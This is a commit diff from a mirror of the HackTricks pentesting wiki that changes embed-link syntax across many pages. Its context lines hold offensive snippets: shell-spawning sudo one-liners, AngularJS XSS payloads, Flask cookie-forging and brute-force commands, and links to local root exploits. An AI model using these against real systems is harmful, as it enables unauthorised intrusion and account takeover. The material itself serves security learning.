maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Fix embed urls

Browse Source
This commit is contained in:
Congon4tor 2025-01-03 02:06:10 +01:00
parent ad3f52d725
commit 4374a7457b
66 changed files with 398 additions and 370 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
src/README.md
View File

@ -35,7 +35,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
{% embed url="https://www.rootedcon.com/" %}
{{#ref}}
https://www.rootedcon.com/
{{#endref}}
---
@ -47,7 +49,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
{{#ref}}
https://go.intigriti.com/hacktricks
{{#endref}}
---
@ -60,7 +64,9 @@ Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banne
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{{#ref}}
https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks
{{#endref}}
---
@ -86,7 +92,9 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
{{#ref}}
https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons
{{#endref}}
---
@ -111,7 +119,9 @@ You can **create a free account** [**here**](https://serpapi.com/users/sign_up)*
Learn the technologies and skills required to perform vulnerability research, penetration testing, and reverse engineering to protect mobile applications and devices. **Master iOS and Android security** through our on-demand courses and **get certified**:
{% embed url="https://academy.8ksec.io/" %}
{{#ref}}
https://academy.8ksec.io/
{{#endref}}
---
@ -127,7 +137,9 @@ Another cool thing about WebSec is that unlike the industry average WebSec is **
In addition to the above WebSec is also a **committed supporter of HackTricks.**
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
{{#ref}}
https://www.youtube.com/watch?v=Zq2JycGDCPM
{{#endref}}
## License & Disclaimer

6
src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md
View File

@ -17,7 +17,9 @@ Usually, all these structures are faked by making an **initial ROP chain that ca
Chek this video for a nice explanation about this technique in the second half of the video:
{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
{{#ref}}
https://youtu.be/ADULSwnQs-s?feature=shared
{{#endref}}
Or check these pages for a step-by-step explanation:
@ -195,5 +197,3 @@ target.interactive()
- 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`.
{{#include ../../banners/hacktricks-training.md}}

6
src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md
View File

@ -59,7 +59,9 @@ If you are curious this is the **sigcontext structure** stored in the stack to l
For a better explanation check also:
{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
{{#ref}}
https://youtu.be/ADULSwnQs-s?feature=shared
{{#endref}}
## Example
@ -143,5 +145,3 @@ target.interactive()
- SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed.
{{#include ../../../banners/hacktricks-training.md}}

6
src/burp-suite.md
View File

@ -10,10 +10,10 @@
[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab.
{% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %}
{{#ref}}
https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e
{{#endref}}
[https://github.com/h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator)
{{#include ./banners/hacktricks-training.md}}

6
src/crypto-and-stego/esoteric-languages.md
View File

@ -52,7 +52,9 @@ Take it to the top
Whisper my world
```
{% embed url="https://codewithrockstar.com/" %}
{{#ref}}
https://codewithrockstar.com/
{{#endref}}
## PETOOH
@ -67,5 +69,3 @@ Kukarek
```
{{#include ../banners/hacktricks-training.md}}

6
src/crypto-and-stego/hash-length-extension-attack.md
View File

@ -29,12 +29,12 @@ If an attacker wants to append the string "append" he can:
### **Tool**
{% embed url="https://github.com/iagox86/hash_extender" %}
{{#ref}}
https://github.com/iagox86/hash_extender
{{#endref}}
### References
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
{{#include ../banners/hacktricks-training.md}}

10
src/crypto-and-stego/rc4-encrypt-and-decrypt.md
View File

@ -4,10 +4,12 @@ If you can somehow encrypt a plaintext using RC4, you can decrypt any content en
If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
{{#ref}}
https://0xrick.github.io/hack-the-box/kryptos/
{{#endref}}
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
{{#ref}}
https://0xrick.github.io/hack-the-box/kryptos/
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

6
src/cryptography/hash-length-extension-attack.md
View File

@ -27,12 +27,12 @@ If an attacker wants to append the string "append" he can:
## **Tool**
{% embed url="https://github.com/iagox86/hash_extender" %}
{{#ref}}
https://github.com/iagox86/hash_extender
{{#endref}}
## References
You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
{{#include ../banners/hacktricks-training.md}}

10
src/cryptography/rc4-encrypt-and-decrypt.md
View File

@ -4,10 +4,12 @@ If you can somehow encrypt a plaintext using RC4, you can decrypt any content en
If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine:
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
{{#ref}}
https://0xrick.github.io/hack-the-box/kryptos/
{{#endref}}
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
{{#ref}}
https://0xrick.github.io/hack-the-box/kryptos/
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

14
src/generic-methodologies-and-resources/external-recon-methodology/README.md
View File

@ -2,7 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
## Assets discoveries
> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
@ -199,8 +198,6 @@ Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
&#xNAN;_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
## Subdomains
> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.
@ -482,9 +479,13 @@ echo www | subzuf facebook.com
Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer:
{% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/" %}
{{#ref}}
https://trickest.com/blog/full-subdomain-discovery-using-workflow/
{{#endref}}
{% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/" %}
{{#ref}}
https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/
{{#endref}}
### **VHosts / Virtual Hosts**
@ -708,7 +709,4 @@ There are several tools out there that will perform part of the proposed actions
- All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
{{#include ../../banners/hacktricks-training.md}}

10
src/linux-hardening/privilege-escalation/README.md
View File

@ -1049,9 +1049,13 @@ The project collects legitimate functions of Unix binaries that can be abused to
> strace -o /dev/null /bin/sh\
> sudo awk 'BEGIN {system("/bin/sh")}'
{% embed url="https://gtfobins.github.io/" %}
{{#ref}}
https://gtfobins.github.io/
{{#endref}}
{% embed url="https://gtfoargs.github.io/" %}
{{#ref}}
https://gtfoargs.github.io/
{{#endref}}
### FallOfSudo
@ -1655,5 +1659,3 @@ cisco-vmanage.md
- [https://www.linode.com/docs/guides/what-is-systemd/](https://www.linode.com/docs/guides/what-is-systemd/)
{{#include ../../banners/hacktricks-training.md}}

11
src/linux-hardening/privilege-escalation/docker-security/README.md
View File

@ -341,13 +341,17 @@ In Kubernetes environments, secrets are natively supported and can be further ma
**gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative (OCI)](https://www.opencontainers.org) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers.
{% embed url="https://github.com/google/gvisor" %}
{{#ref}}
https://github.com/google/gvisor
{{#endref}}
### Kata Containers
**Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense.
{% embed url="https://katacontainers.io/" %}
{{#ref}}
https://katacontainers.io/
{{#endref}}
### Summary Tips
@ -403,7 +407,4 @@ authz-and-authn-docker-access-authorization-plugin.md
- [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57)
- [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/)
{{#include ../../../banners/hacktricks-training.md}}

10
src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
View File

@ -241,9 +241,13 @@ Finally, if you don't like any of the suggestions of before, or they aren't work
If you have write permissions over the docker socket read [**this post about how to escalate privileges abusing the docker socket**](../#writable-docker-socket)**.**
{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}
{{#ref}}
https://github.com/KrustyHack/docker-privilege-escalation
{{#endref}}
{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}
{{#ref}}
https://fosterelli.co/privilege-escalation-via-docker.html
{{#endref}}
## lxc/lxd Group
@ -262,5 +266,3 @@ Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey*
These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot)
{{#include ../../../banners/hacktricks-training.md}}

13
src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
View File

@ -1,7 +1,5 @@
{{#include ../../banners/hacktricks-training.md}}
# Sudo/Admin Groups
## **PE - Method 1**
@ -158,15 +156,16 @@ find / -group root -perm -g=w 2>/dev/null
You can mount the root filesystem of the host machine to an instances volume, so when the instance starts it immediately loads a `chroot` into that volume. This effectively gives you root on the machine.
{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}
{{#ref}}
https://github.com/KrustyHack/docker-privilege-escalation
{{#endref}}
{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}
{{#ref}}
https://fosterelli.co/privilege-escalation-via-docker.html
{{#endref}}
# lxc/lxd Group
[lxc - Privilege Escalation](lxd-privilege-escalation.md)
{{#include ../../banners/hacktricks-training.md}}

95
src/misc/references.md
View File

@ -1,52 +1,95 @@
{{#include ../banners/hacktricks-training.md}}
{% embed url="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick" %}
{{#ref}}
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick
{{#endref}}
{% embed url="https://hausec.com/pentesting-cheatsheet/#_Toc475368982" %}
{{#ref}}
https://hausec.com/pentesting-cheatsheet/#_Toc475368982
{{#endref}}
{% embed url="https://anhtai.me/pentesting-cheatsheet/" %}
{{#ref}}
https://anhtai.me/pentesting-cheatsheet/
{{#endref}}
{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %}
{{#ref}}
https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html
{{#endref}}
{% embed url="https://ired.team/offensive-security-experiments/offensive-security-cheetsheets" %}
{{#ref}}
https://ired.team/offensive-security-experiments/offensive-security-cheetsheets
{{#endref}}
{% embed url="https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html" %}
{{#ref}}
https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html
{{#endref}}
{% embed url="https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md" %}
{{#ref}}
https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
{{#endref}}
{% embed url="https://anhtai.me/oscp-fun-guide/" %}
{{#ref}}
https://anhtai.me/oscp-fun-guide/
{{#endref}}
{% embed url="https://www.thehacker.recipes/" %}
{{#ref}}
https://www.thehacker.recipes/
{{#endref}}
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings" %}
{{#ref}}
https://github.com/swisskyrepo/PayloadsAllTheThings
{{#endref}}
{% embed url="https://gtfobins.github.io/" %}
{{#ref}}
https://gtfobins.github.io/
{{#endref}}
{% embed url="https://github.com/RistBS/Awesome-RedTeam-Cheatsheet" %}
{{#ref}}
https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
{{#endref}}
{% embed url="https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet" %}
{{#ref}}
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
{{#endref}}
{% embed url="https://hideandsec.sh/" %}
{{#ref}}
https://hideandsec.sh/
{{#endref}}
{% embed url="https://cheatsheet.haax.fr/" %}
{{#ref}}
https://cheatsheet.haax.fr/
{{#endref}}
{% embed url="https://infosecwriteups.com/" %}
{{#ref}}
https://infosecwriteups.com/
{{#endref}}
{% embed url="https://www.exploit-db.com/" %}
{{#ref}}
https://www.exploit-db.com/
{{#endref}}
{% embed url="https://wadcoms.github.io/" %}
{{#ref}}
https://wadcoms.github.io/
{{#endref}}
{% embed url="https://lolbas-project.github.io" %}
{{#ref}}
https://lolbas-project.github.io
{{#endref}}
{% embed url="https://pentestbook.six2dez.com/" %}
{{#ref}}
https://pentestbook.six2dez.com/
{{#endref}}
{% embed url="https://www.hackingarticles.in/" %}
{{#ref}}
https://www.hackingarticles.in/
{{#endref}}
{% embed url="https://pentestlab.blog/" %}
{{#ref}}
https://pentestlab.blog/
{{#endref}}
{% embed url="https://ippsec.rocks/" %}
{{#ref}}
https://ippsec.rocks/
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

7
src/network-services-pentesting/5439-pentesting-redshift.md
View File

@ -8,9 +8,8 @@ This port is used by **Redshift** to run. It's basically an AWS variation of **P
For more information check:
{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum" %}
{{#ref}}
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-services/aws-databases/aws-redshift-enum
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

7
src/network-services-pentesting/9100-pjl.md
View File

@ -54,13 +54,12 @@ msf> use auxiliary/scanner/printer/printer_delete_file
This is the tool you want to use to abuse printers:
{% embed url="https://github.com/RUB-NDS/PRET" %}
{{#ref}}
https://github.com/RUB-NDS/PRET
{{#endref}}
# **Shodan**
- `pjl port:9100`
{{#include ../banners/hacktricks-training.md}}

9
src/network-services-pentesting/9200-pentesting-elasticsearch.md
View File

@ -2,7 +2,6 @@
{{#include ../banners/hacktricks-training.md}}
## Basic information
Elasticsearch is a **distributed**, **open source** search and analytics engine for **all types of data**. It is known for its **speed**, **scalability**, and **simple REST APIs**. Built on Apache Lucene, it was first released in 2010 by Elasticsearch N.V. (now known as Elastic). Elasticsearch is the core component of the Elastic Stack, a collection of open source tools for data ingestion, enrichment, storage, analysis, and visualization. This stack, commonly referred to as the ELK Stack, also includes Logstash and Kibana, and now has lightweight data shipping agents called Beats.
@ -176,14 +175,12 @@ Some tools will obtain some of the data presented before:
msf > use auxiliary/scanner/elasticsearch/indices_enum
```
{% embed url="https://github.com/theMiddleBlue/nmap-elasticsearch-nse" %}
{{#ref}}
https://github.com/theMiddleBlue/nmap-elasticsearch-nse
{{#endref}}
## Shodan
- `port:9200 elasticsearch`
{{#include ../banners/hacktricks-training.md}}

7
src/network-services-pentesting/pentesting-compaq-hp-insight-manager.md
View File

@ -4,7 +4,9 @@
# **Default passwords**
{% embed url="http://www.vulnerabilityassessment.co.uk/passwordsC.htm" %}
{{#ref}}
http://www.vulnerabilityassessment.co.uk/passwordsC.htm
{{#endref}}
# Config files
@ -19,6 +21,3 @@ jboss-service.xml
```
{{#include ../banners/hacktricks-training.md}}

7
src/network-services-pentesting/pentesting-kerberos-88/README.md
View File

@ -29,7 +29,9 @@ PORT STATE SERVICE
The MS14-068 flaw permits an attacker to tamper with a legitimate user's Kerberos login token to falsely claim elevated privileges, such as being a Domain Admin. This counterfeit claim is mistakenly validated by the Domain Controller, enabling unauthorized access to network resources across the Active Directory forest.
{% embed url="https://adsecurity.org/?p=541" %}
{{#ref}}
https://adsecurity.org/?p=541
{{#endref}}
Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek)
@ -66,6 +68,3 @@ Entry_4:
```
{{#include ../../banners/hacktricks-training.md}}

11
src/network-services-pentesting/pentesting-ssh.md
View File

@ -2,8 +2,6 @@
{{#include ../banners/hacktricks-training.md}}
## Basic Information
**SSH (Secure Shell or Secure Socket Shell)** is a network protocol that enables a secure connection to a computer over an unsecured network. It is essential for maintaining the confidentiality and integrity of data when accessing remote systems.
@ -135,7 +133,9 @@ Or use `ssh-keybrute.py` (native python3, lightweight and has legacy algorithms
#### Known badkeys can be found here:
{% embed url="https://github.com/rapid7/ssh-badkeys/tree/master/authorized" %}
{{#ref}}
https://github.com/rapid7/ssh-badkeys/tree/master/authorized
{{#endref}}
#### Weak SSH keys / Debian predictable PRNG
@ -318,8 +318,6 @@ id_rsa
- You can find interesting guides on how to harden SSH in [https://www.ssh-audit.com/hardening_guides.html](https://www.ssh-audit.com/hardening_guides.html)
- [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide)
## HackTricks Automatic Commands
```
@ -341,6 +339,3 @@ Entry_2:
```
{{#include ../banners/hacktricks-training.md}}

7
src/network-services-pentesting/pentesting-web/buckets/README.md
View File

@ -4,9 +4,8 @@
Check this page if you want to learn more about enumerating and abusing Buckets:
{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum" %}
{{#ref}}
https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

7
src/network-services-pentesting/pentesting-web/buckets/firebase-database.md
View File

@ -8,9 +8,8 @@ Firebase is a Backend-as-a-Services mainly for mobile application. It is focused
Learn more about Firebase in:
{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum" %}
{{#ref}}
https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-databases-enum/gcp-firebase-enum
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

7
src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
View File

@ -17,7 +17,9 @@ process.on("exit", function () {
})
```
{% embed url="https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36" %}
{{#ref}}
https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36
{{#endref}}
![](<../../../images/image (1070).png>)
@ -61,6 +63,3 @@ Exploit:
<figure><img src="../../../images/image (89).png" alt=""><figcaption></figcaption></figure>
{{#include ../../../banners/hacktricks-training.md}}

11
src/network-services-pentesting/pentesting-web/flask.md
View File

@ -26,7 +26,9 @@ The cookie is also signed using a password
Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
{% embed url="https://pypi.org/project/flask-unsign/" %}
{{#ref}}
https://pypi.org/project/flask-unsign/
{{#endref}}
```bash
pip3 install flask-unsign
@ -60,7 +62,9 @@ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
Command line tool to brute-force websites using cookies crafted with flask-unsign.
{% embed url="https://github.com/Tagvi/ripsession" %}
{{#ref}}
https://github.com/Tagvi/ripsession
{{#endref}}
```bash
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
@ -100,6 +104,3 @@ app.run(host='0.0.0.0', port=8080)
Could allow to introduce something like "@attacker.com" in order to cause a **SSRF**.
{{#include ../../banners/hacktricks-training.md}}

9
src/network-services-pentesting/pentesting-web/graphql.md
View File

@ -2,7 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
## Introduction
GraphQL is **highlighted** as an **efficient alternative** to REST API, offering a simplified approach for querying data from the backend. In contrast to REST, which often necessitates numerous requests across varied endpoints to gather data, GraphQL enables the fetching of all required information through a **single request**. This streamlining significantly **benefits developers** by diminishing the intricacy of their data fetching processes.
@ -623,7 +622,9 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" -H "Content-Type: application/jso
### Automatic Tests
{% embed url="https://graphql-dashboard.herokuapp.com/" %}
{{#ref}}
https://graphql-dashboard.herokuapp.com/
{{#endref}}
- Video explaining AutoGraphQL: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU)
@ -637,8 +638,4 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" -H "Content-Type: application/jso
- [**https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696**](https://medium.com/@the.bilal.rizwan/graphql-common-vulnerabilities-how-to-exploit-them-464f9fdce696)
- [**https://portswigger.net/web-security/graphql**](https://portswigger.net/web-security/graphql)
{{#include ../../banners/hacktricks-training.md}}

7
src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md
View File

@ -43,7 +43,9 @@ Note that even if this was done for AWS machines, it could be done for any other
For a better description of this process check:
{% embed url="https://trickest.com/blog/cloudflare-bypass-discover-ip-addresses-aws/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{{#ref}}
https://trickest.com/blog/cloudflare-bypass-discover-ip-addresses-aws/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks
{{#endref}}
```bash
# Find open ports
@ -141,6 +143,3 @@ Find more info about how to do this in the [original article](https://scrapeops.
- [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/)
{{#include ../../banners/hacktricks-training.md}}

9
src/network-services-pentesting/pentesting-web/werkzeug.md
View File

@ -2,7 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
## Console RCE
If debug is active you could try to access to `/console` and gain RCE.
@ -162,7 +161,9 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a
## Automated Exploitation
{% embed url="https://github.com/Ruulian/wconsole_extractor" %}
{{#ref}}
https://github.com/Ruulian/wconsole_extractor
{{#endref}}
## References
@ -171,8 +172,4 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a
- [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833)
- [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python)
{{#include ../../banners/hacktricks-training.md}}

7
src/network-services-pentesting/pentesting-web/wordpress.md
View File

@ -249,7 +249,9 @@ This is the response when it doesn't work:
## SSRF
{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}
{{#ref}}
https://github.com/t0gu/quickpress/blob/master/core/requests.go
{{#endref}}
This tool checks if the **methodName: pingback.ping** and for the path **/wp-json/oembed/1.0/proxy** and if exists, it tries to exploit them.
@ -435,6 +437,3 @@ Also, **only install trustable WordPress plugins and themes**.
- Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
{{#include ../../banners/hacktricks-training.md}}

9
src/other-web-tricks.md
View File

@ -2,7 +2,6 @@
{{#include ./banners/hacktricks-training.md}}
### Host header
Several times the back-end trust the **Host header** to perform some actions. For example, it could use its value as the **domain to send a password reset**. So when you receive an email with a link to reset your password, the domain being used is the one you put in the Host header.Then, you can request the password reset of other users and change the domain to one controlled by you to steal their password reset codes. [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
@ -10,7 +9,6 @@ Several times the back-end trust the **Host header** to perform some actions. Fo
> [!WARNING]
> Note that it's possible that you don't even need to wait for the user to click on the reset password link to get the token, as maybe even **spam filters or other intermediary devices/bots will click on it to analyze it**.
### Session booleans
Some times when you complete some verification correctly the back-end will **just add a boolean with the value "True" to a security attribute your session**. Then, a different endpoint will know if you successfully passed that check.\
@ -26,7 +24,9 @@ Register an email, before confirming it change the email, then, if the new confi
### Access Internal servicedesk of companies using atlassian
{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
{{#ref}}
https://yourcompanyname.atlassian.net/servicedesk/customer/user/login
{{#endref}}
### TRACE method
@ -34,7 +34,4 @@ Developers might forget to disable various debugging options in the production e
![Image for post](https://miro.medium.com/max/1330/1*wDFRADTOd9Tj63xucenvAA.png)
{{#include ./banners/hacktricks-training.md}}

7
src/pentesting-web/captcha-bypass.md
View File

@ -32,9 +32,8 @@ To **bypass** the captcha during **server testing** and automate user input func
[**CapSolver**](https://www.capsolver.com/?utm_source=google&utm_medium=ads&utm_campaign=scraping&utm_term=hacktricks&utm_content=captchabypass) is an AI-powered service that specializes in solving various types of captchas automatically, empowers data collection by helping developers easily overcome the captcha challenges encountered during Web Scraping. It supports captchas such as **reCAPTCHA V2, reCAPTCHA V3, DataDome, AWS Captcha, Geetest, and Cloudflare turnstile among others**. For developers, Capsolver offers API integration options detailed in [**documentation**](https://docs.capsolver.com/?utm_source=github&utm_medium=banner_github&utm_campaign=fcsrv)**,** facilitating the integration of captcha solving into applications. They also provide browser extensions for [Chrome](https://chromewebstore.google.com/detail/captcha-solver-auto-captc/pgojnojmmhpofjgdmaebadhbocahppod) and [Firefox](https://addons.mozilla.org/es/firefox/addon/capsolver-captcha-solver/), making it easy to use their service directly within a browser. Different pricing packages are available to accommodate varying needs, ensuring flexibility for users.
{% embed url="https://www.capsolver.com/?utm_campaign=scraping&utm_content=captchabypass&utm_medium=ads&utm_source=google&utm_term=hacktricks" %}
{{#ref}}
https://www.capsolver.com/?utm_campaign=scraping&utm_content=captchabypass&utm_medium=ads&utm_source=google&utm_term=hacktricks
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

12
src/pentesting-web/client-side-template-injection-csti.md
View File

@ -2,7 +2,6 @@
{{#include ../banners/hacktricks-training.md}}
## Summary
It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/) but in the **client**. The **SSTI** can allow you to **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim's browser.
@ -26,8 +25,7 @@ In scenarios where user input is dynamically inserted into the HTML body tagged
You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) and in [**Burp Suite Academy**](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)
> [!CAUTION]
> [**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `<input ng-focus=$event.view.alert('XSS')>` should work.
> [!CAUTION] > [**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `<input ng-focus=$event.view.alert('XSS')>` should work.
## VueJS
@ -83,10 +81,8 @@ javascript:alert(1)%252f%252f..%252fcss-images
## **Brute-Force Detection List**
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

9
src/pentesting-web/command-injection.md
View File

@ -2,7 +2,6 @@
{{#include ../banners/hacktricks-training.md}}
## What is command Injection?
A **command injection** permits the execution of arbitrary operating system commands by an attacker on the server hosting an application. As a result, the application and all its data can be fully compromised. The execution of these commands typically allows the attacker to gain unauthorized access or control over the application's environment and underlying system.
